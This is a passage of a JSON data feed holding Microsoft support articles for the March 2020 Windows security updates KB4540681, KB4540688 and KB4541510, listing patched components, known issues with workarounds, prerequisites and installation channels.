and cursors from appearing as expected.\u00a0</li></ul><h2>Improvements and fixes</h2><div><p>This security update includes quality improvements. Key changes include:</p><ul><li>Addresses an issue that might prevent icons and cursors from appearing as expected.\u00a0</li><li>Security updates to Microsoft Scripting Engine, Windows App Platform and Frameworks, Microsoft Graphics Component, Windows Media, Windows Silicon Platform, Microsoft Edge, Internet Explorer, Windows Fundamentals, Windows Authentication, Windows Cryptography, Windows Kernel, Windows Core Networking, Windows Storage and Filesystems, Windows Peripherals, Windows Network Security and Containers, Windows Update Stack, and Windows Server.</li></ul><p>If you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.</p><p>For more information about the resolved security vulnerabilities, please refer to the <a href=\"https://portal.msrc.microsoft.com/security-guidance\">Security Update Guide</a>.</p></div><h2>Known issues in this update</h2><table class=\"table\"><tbody><tr><td><strong>Symptom</strong></td><td><strong>Workaround</strong></td></tr><tr><td>Devices using a manual or auto-configured proxy, especially with a virtual private network (VPN), might show limited or no internet connection status in the Network Connectivity Status Indicator (NCSI) in the notification area. This might happen when connected to or disconnected from a VPN or after changing the state between the two. Devices with this issue might also have issues reaching the internet using applications that use WinHTTP or WinInet. Examples of apps that might be affected on devices in this state include, but are not limited to, Microsoft Teams, Microsoft Office, Microsoft Office 365, Microsoft Outlook, Internet Explorer 11, and some versions of Microsoft Edge.</td><td><p>This issue is resolved in <a data-content-id=\"4554342\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4554342</a>.</p><span></span></td></tr><tr><td>Devices on a domain might be unable to install apps published using a Group Policy Object (GPO). This issue only affects app installations that use .msi files. It does not affect any other installation methods, such as from the Microsoft Store.</td><td><p class=\"x\">To mitigate this issue, manually install the app on the device.</p><span><span><span>We are working on a resolution and will provide an update in an upcoming release.</span></span></span></td></tr></tbody></table><p>\u00a0</p><h2>How to get this update</h2><p><strong>Before installing this update</strong></p><p>Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs,\u00a0see <a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" href=\"https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">Servicing stack updates</a>\u00a0and\u00a0<a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" data-content-id=\"4535697\" data-content-type=\"article\" href=\"\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">Servicing Stack Updates (SSU): Frequently Asked Questions</a>.</p><p>If you are using Windows Update, the latest SSU (<a data-content-id=\"4541731\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4541731</a>) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the <a data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/home.aspx\" managed-link=\"\" target=\"\">Microsoft Update Catalog</a>.</p><p><strong>Install this update</strong></p><table class=\"table\"><tbody><tr><td><strong>Release Channel</strong></td><td align=\"center\"><strong>Available</strong></td><td><strong>Next Step</strong></td></tr><tr><td>Windows Update and Microsoft Update</td><td align=\"center\">Yes</td><td>None. This update will be downloaded and installed automatically from Windows Update.</td></tr><tr><td>Microsoft Update Catalog</td><td align=\"center\">Yes</td><td>To get the standalone package for this update, go to the\u00a0<a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4540681\">Microsoft Update Catalog</a>\u00a0website.</td></tr><tr><td>Windows Server Update Services (WSUS)</td><td align=\"center\">Yes</td><td><p>This update will automatically sync\u00a0with WSUS if you configure <strong>Products and Classifications</strong> as follows:</p><p><strong>Product</strong>: Windows 10</p><strong>Classification</strong>: Security Updates</td></tr></tbody></table><p>\u00a0</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"https://download.microsoft.com/download/8/9/9/8998d2cc-88c3-4443-bc54-25618bb60bbe/4540681.csv\" managed-link=\"\" target=\"_blank\">file information for cumulative update 4540681</a>.\u00a0</p></body></html>", "modified": "2020-04-07T23:09:30", "id": "KB4540681", "href": "https://support.microsoft.com/en-us/help/4540681/", "published": "2020-04-07T23:09:16", "title": "March 10, 2020\u2014KB4540681 (OS Build 16299.1747)", "type": "mskb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-04-08T14:26:44", "bulletinFamily": "microsoft", "description": "<html><body><p>Learn more about update KB4540688, including improvements and fixes, any known issues, and how to get the update.</p><h2></h2><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><strong>IMPORTANT </strong>Verify that<strong> </strong>you have installed the required updates listed in the <strong>How to get this update</strong> section <u>before</u> installing this update.\u00a0</p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><strong>IMPORTANT </strong>Some customers who use Windows Server 2008 R2 SP1 and have activated their ESU multiple activation key (MAK) add-on before installing the January 14, 2020 updates might\u00a0need to re-activate\u00a0their key.\u00a0Re-activation on the affected devices should only be required once.\u202f For information on activation, see this\u00a0<a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"https://aka.ms/Windows7ESU\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">blog</a>\u00a0post.</p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p class=\"CxSpFirst\"><span><span><span><strong>IMPORTANT</strong>\u00a0<span><span>WSUS scan cab files will continue to be available for Windows 7 SP1 and\u00a0Windows Server 2008 R2 SP1.\u00a0</span></span></span></span></span><span><span>If you have a subset of devices running these operating systems without ESU, they might show as <u>non-compliant</u> in your patch management and compliance toolsets.</span></span></p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p class=\"CxSpFirst\"><strong><span>IMPORTANT</span></strong><span> Customers who have purchased the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"https://www.microsoft.com/en-us/cloud-platform/extended-security-updates\" managed-link=\"\" target=\"_blank\">Extended Security Update (ESU)</a>\u00a0for</span> on-premises versions of these operating systems\u00a0must follow the procedures in <a data-content-id=\"4522133\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4522133</a>\u00a0to continue receiving security updates after extended support ends\u00a0on\u00a0January 14, 2020.\u00a0For more information on ESU and which editions are supported, see <a data-content-id=\"4497181\" data-content-type=\"article\" href=\"\" managed-link=\"\">KB4497181</a>.</p></div></div></div></div><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><span><span><strong>IMPORTANT</strong> Starting on January 15, 2020, a full-screen notification will appear that describes the risk of continuing to use Windows 7 Service Pack 1 after it reaches end of support on January 14, 2020. The notification will remain on the screen until you interact with it. <span>This notification </span>will only appear on the following <span>editions of Windows 7 Service Pack 1</span>:</span></span></p><ul><li>Starter.</li><li>Home Basic.</li><li>Home Premium.</li><li>Professional. If you have purchased the Extended Security Update (ESU), the <span><span>notification</span></span> will not appear. For more information, see<a href=\"https://techcommunity.microsoft.com/t5/Windows-IT-Pro-Blog/How-to-get-Extended-Security-Updates-for-eligible-Windows/ba-p/917807\" managed-link=\"\" target=\"_blank\">\u00a0How to get Extended Security Updates for eligible Windows devices</a>\u00a0and\u00a0<a href=\"https://support.microsoft.com/{lang-locale}/help/4497181/lifecycle-faq-extended-security-updates\" managed-link=\"\" target=\"_blank\">Lifecycle FAQ-Extended Security Updates</a>.</li><li>Ultimate.\u00a0</li></ul><p><strong>Note\u00a0</strong>The <span><span>notification</span></span> will not appear on\u00a0domain-joined machines or machines in kiosk mode.</p></div></div></div></div><h2>Improvements and fixes</h2><div><p>This security update includes improvements and fixes that were a part of update <a data-content-id=\"4537820\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4537820 </a>(released February11, 2020) and addresses the following issues:</p><ul><li>Addresses an issue that might prevent icons and cursors from appearing as expected.\u00a0</li><li>Security updates to the Microsoft Scripting Engine, Internet Explorer, Windows App Platform and Frameworks, Microsoft Graphics Component, Windows Fundamentals, Windows Authentication, Windows Cryptography, Windows Core Networking, Windows Storage and Filesystems, Windows Peripherals, and Windows Server .</li></ul><p>For more information about the resolved security vulnerabilities, please refer to the <a href=\"https://portal.msrc.microsoft.com/security-guidance\">Security Update Guide</a>.</p></div><h2>Known issues in this update</h2><div><table class=\"table\"><tbody><tr><td><strong>Symptom</strong></td><td><strong>Workaround</strong></td></tr><tr><td>After installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer,\u201d and the update might show as\u00a0<strong>Failed</strong>\u00a0in\u00a0<strong>Update History</strong>.</td><td><p>This is expected in the following circumstances:</p><ul><li>If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see <a data-content-id=\"4497181\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4497181</a>.</li><li>If you do not have an ESU MAK add-on key installed and activated.\u00a0</li></ul><p>If you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this\u00a0<a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"https://aka.ms/Windows7ESU\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">blog</a>\u00a0post.\u00a0For information on the prerequisites, see the \"How to get this update\" section of this article.</p></td></tr><tr><td>Certain operations, such as <strong>rename</strong>, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.</td><td><p>Do one of the following:</p><ul><li>Perform the operation from a process that has administrator privilege.</li><li>Perform the operation from a node that doesn\u2019t have CSV ownership.</li></ul>Microsoft is working on a resolution and will provide an update in an upcoming release.</td></tr><tr><td>Devices on a domain might be unable to install apps published using a Group Policy Object (GPO). This issue only affects app installations that use .msi files. It does not affect any other installation methods, such as from the Microsoft Store.</td><td><p class=\"x\">To mitigate this issue, manually install the app on the device.</p><span><span><span>We are working on a resolution and will provide an update in an upcoming release.</span></span></span></td></tr></tbody></table></div><h2>How to get this update</h2><p><strong>Before installing this update</strong></p><p><strong>Prerequisite:</strong></p><p>You must install\u00a0the updates listed below and\u00a0<strong><u>restart your device</u></strong>\u00a0before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.</p><ol><li>The\u00a0March 12, 2019 servicing stack update (SSU) (<a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" data-content-id=\"4490628\" data-content-type=\"article\" href=\"https://support.microsoft.com/en/help/4490628\" managed-link=\"\" tabindex=\"0\" target=\"\">KB4490628</a>).\u00a0 To get the standalone package for this SSU, search for it in the\u00a0<a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/home.aspx\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">Microsoft Update Catalog</a>. This update is required to install updates that are only SHA-2 signed.</li><li>The latest SHA-2 update (<a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" data-content-id=\"4474419\" data-content-type=\"article\" href=\"https://support.microsoft.com/en/help/4474419\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">KB4474419</a>) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see\u00a0<a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" data-content-id=\"4472027\" data-content-type=\"article\" href=\"https://support.microsoft.com/en/help/4472027\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">2019 SHA-2 Code Signing Support requirement for Windows and WSUS</a>.</li><li>The February 11, 2020 SSU (<a data-content-id=\"4537829\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4537829</a>) or later. To get the standalone package for this SSU, search for it in the\u00a0<a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/home.aspx\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">Microsoft Update Catalog</a>.\u00a0</li><li>The Extended Security Updates (ESU) Licensing Preparation Package (<a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" data-content-id=\"4538483\" data-content-type=\"article\" href=\"https://support.microsoft.com/en/help/4538483\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">KB4538483</a>) released February 11, 2020. The ESU licensing preparation package will be offered to you from WSUS.\u00a0To get the standalone package for ESU licensing preparation package, search for it in the\u00a0<a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/home.aspx\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">Microsoft Update Catalog</a>.</li></ol><p>After installing the items above, Microsoft strongly recommends that you install the\u00a0<u>latest</u>\u00a0SSU (<a data-content-id=\"4550735\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4550735</a>).\u00a0If you are using Windows Update, the latest SSU\u00a0will be offered to you automatically if you are an ESU customer.\u00a0To get the standalone package for the latest\u00a0SSU, search for it in the\u00a0<a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/home.aspx\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">Microsoft Update Catalog</a>. For general information about SSUs,\u00a0see <a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" href=\"https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">Servicing stack updates</a>\u00a0and\u00a0<a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" data-content-id=\"4535697\" data-content-type=\"article\" href=\"\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">Servicing Stack Updates (SSU): Frequently Asked Questions</a>.</p><p><strong>Install this update</strong></p><table class=\"table\"><tbody><tr><td><strong>Release Channel</strong></td><td align=\"center\"><strong>Available</strong></td><td><strong>Next Step</strong></td></tr><tr><td>Windows Update and Microsoft Update</td><td align=\"center\">Yes</td><td>None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer.</td></tr><tr><td>Microsoft Update Catalog</td><td align=\"center\">Yes</td><td>To get the standalone package for this update, go to the\u00a0<a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4540688\">Microsoft Update Catalog</a>\u00a0website.</td></tr><tr><td>Windows Server Update Services (WSUS)</td><td align=\"center\">Yes</td><td><p>This update will automatically sync\u00a0with WSUS if you configure <strong>Products and Classifications</strong> as follows:</p><p><strong>Product</strong>:\u00a0\u00a0Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1,\u00a0Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC</p><strong>Classification</strong>: Security Updates</td></tr></tbody></table><p>\u00a0</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"https://download.microsoft.com/download/2/3/3/23334892-f367-4f60-b2d8-c46c2aed80d5/4540688.csv\" managed-link=\"\" target=\"_blank\">file information for update 4540688</a>.\u00a0</p></body></html>", "modified": "2020-04-07T22:39:46", "id": "KB4540688", "href": "https://support.microsoft.com/en-us/help/4540688/", "published": "2020-04-07T22:39:29", "title": "March 10, 2020\u2014KB4540688 (Monthly Rollup)", "type": "mskb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-04-08T14:25:52", "bulletinFamily": "microsoft", "description": "<html><body><p>Learn more about update KB4541510, including improvements and fixes, any known issues, and how to get the update.</p><h2></h2><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><sup><strong>NEW</strong></sup><br/>As of February 11, 2020, Internet Explorer 10 is no longer in support. To get Internet Explorer 11 for Windows Server 2012 or Windows 8 Embedded Standard, see <a data-content-id=\"4492872\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4492872</a>. Install one of the following applicable updates to stay updated with the latest security fixes:</p><ul><li><p>Cumulative Update for Internet Explorer 11 for Windows Server 2012.</p></li><li><p>Cumulative Update for Internet Explorer 11 for Windows 8 Embedded Standard.</p></li><li><p>The March 2020 Monthly Rollup.</p></li></ul></div></div></div></div><h2>Improvements and fixes</h2><div><p>This security update includes improvements and fixes that were a part of update <a data-content-id=\"4537807\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4537807 </a>(released February 25, 2020) and addresses the following issues:</p><ul><li>Addresses an issue that might prevent icons and cursors from appearing as expected.</li><li>Security updates to the Microsoft Scripting Engine, Internet Explorer, Windows App Platform and Frameworks, Microsoft Graphics Component, Windows Silicon Platform, Windows Fundamentals, Windows Authentication, Windows Cryptography, Windows Core Networking, Windows Storage and Filesystems, Windows Peripherals, and Windows Server.</li></ul><p>For more information about the resolved security vulnerabilities, please refer to the <a href=\"https://portal.msrc.microsoft.com/security-guidance\">Security Update Guide</a>.</p></div><h2>Known issues in this update</h2><div><table class=\"table\"><tbody><tr><td><strong>Symptom</strong></td><td><strong>Workaround</strong></td></tr><tr><td>Certain operations, such as <strong>rename</strong>, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.</td><td><p>Do one of the following:</p><ul><li>Perform the operation from a process that has administrator privilege.</li><li>Perform the operation from a node that doesn\u2019t have CSV ownership.</li></ul>Microsoft is working on a resolution and will provide an update in an upcoming release.</td></tr><tr><td>Devices on a domain might be unable to install apps published using a Group Policy Object (GPO). This issue only affects app installations that use .msi files. It does not affect any other installation methods, such as from the Microsoft Store.</td><td><p class=\"x\">To mitigate this issue, manually install the app on the device.</p><span><span><span>We are working on a resolution and will provide an update in an upcoming release.</span></span></span></td></tr></tbody></table></div><h2>How to get this update</h2><p><strong>Before installing this update</strong></p><p>Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes.\u00a0For general information about SSUs,\u00a0see <a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" href=\"https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">Servicing stack updates</a>\u00a0and\u00a0<a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" data-content-id=\"4535697\" data-content-type=\"article\" href=\"\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">Servicing Stack Updates (SSU): Frequently Asked Questions</a>.</p><p>If you are using Windows Update, the latest SSU\u00a0(<a data-content-id=\"4540726\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4540726</a>) will be offered to you automatically.\u00a0To get the standalone package for the latest\u00a0SSU, search for it in the\u00a0<a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/home.aspx\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">Microsoft Update Catalog</a>.\u00a0</p><p><strong>Install this update</strong></p><table class=\"table\"><tbody><tr><td><strong>Release Channel</strong></td><td align=\"center\"><strong>Available</strong></td><td><strong>Next Step</strong></td></tr><tr><td>Windows Update and Microsoft Update</td><td align=\"center\">Yes</td><td>None. This update will be downloaded and installed automatically from Windows Update.</td></tr><tr><td>Microsoft Update Catalog</td><td align=\"center\">Yes</td><td>To get the standalone package for this update, go to the\u00a0<a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4541510\">Microsoft Update Catalog</a>\u00a0website.</td></tr><tr><td>Windows Server Update Services (WSUS)</td><td align=\"center\">Yes</td><td><p>This update will automatically sync\u00a0with WSUS if you configure <strong>Products and Classifications</strong> as follows:</p><p><strong>Product</strong>: Windows Server 2012, Windows Embedded 8 Standard</p><strong>Classification</strong>: Security Updates</td></tr></tbody></table><p>\u00a0</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"https://download.microsoft.com/download/7/d/9/7d95375b-7fac-4fa0-aa24-d14c421dc633/4541510.csv\" managed-link=\"\" target=\"_blank\">file information for update 4541510</a>.\u00a0</p></body></html>", "modified": "2020-04-07T22:33:42", "id": "KB4541510", "href": "https://support.microsoft.com/en-us/help/4541510/", "published": "2020-04-07T22:33:29", "title": "March 10, 2020\u2014KB4541510 (Monthly Rollup)", "type": "mskb", "cvss": {"score": 0.0, "vector": "NONE"}}]}
